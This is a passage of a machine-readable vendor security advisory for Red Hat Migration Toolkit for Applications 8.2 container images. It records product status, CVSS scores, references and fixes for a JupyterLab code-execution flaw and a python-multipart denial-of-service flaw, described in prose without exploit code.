"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42557"
},
{
"category": "external",
"summary": "RHBZ#2477086",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477086"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42557",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42557"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42557",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42557"
},
{
"category": "external",
"summary": "https://github.com/jupyterlab/jupyterlab/security/advisories/GHSA-mqcg-5x36-vfcg",
"url": "https://github.com/jupyterlab/jupyterlab/security/advisories/GHSA-mqcg-5x36-vfcg"
}
],
"release_date": "2026-05-13T15:06:14.222000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-21T22:10:10+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:43038"
},
{
"category": "workaround",
"details": "Users should avoid opening or interacting with JupyterLab notebooks from untrusted sources. Exercise caution and verify the origin of any notebook before clicking buttons within its output, as this action could lead to the execution of arbitrary commands.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "jupyterlab: JupyterLab: Arbitrary code execution via deceptive button in HTML output"
},
{
"cve": "CVE-2026-42561",
"cwe": {
"id": "CWE-606",
"name": "Unchecked Input for Loop Condition"
},
"discovery_date": "2026-05-13T22:01:05.319675+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477309"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in python-multipart. A remote attacker can exploit this denial of service (DoS) vulnerability by sending a specially crafted request with an excessive number of part headers or a single very large header value during multipart/form-data parsing. This can lead to excessive CPU utilization, resulting in a denial of service for the affected system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-multipart: python-multipart: Denial of Service via excessive multipart part headers",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important denial of service vulnerability in python-multipart. A remote attacker can trigger excessive CPU utilization by sending specially crafted multipart/form-data requests, leading to service disruption.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"known_not_affected": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42561"
},
{
"category": "external",
"summary": "RHBZ#2477309",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477309"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42561",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42561"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42561",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42561"
},
{
"category": "external",
"summary": "https://github.com/Kludex/python-multipart/security/advisories/GHSA-pp6c-gr5w-3c5g",
"url": "https://github.com/Kludex/python-multipart/security/advisories/GHSA-pp6c-gr5w-3c5g"
}
],
"release_date": "2026-05-13T20:55:11.767000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-21T22:10:10+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:43038"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
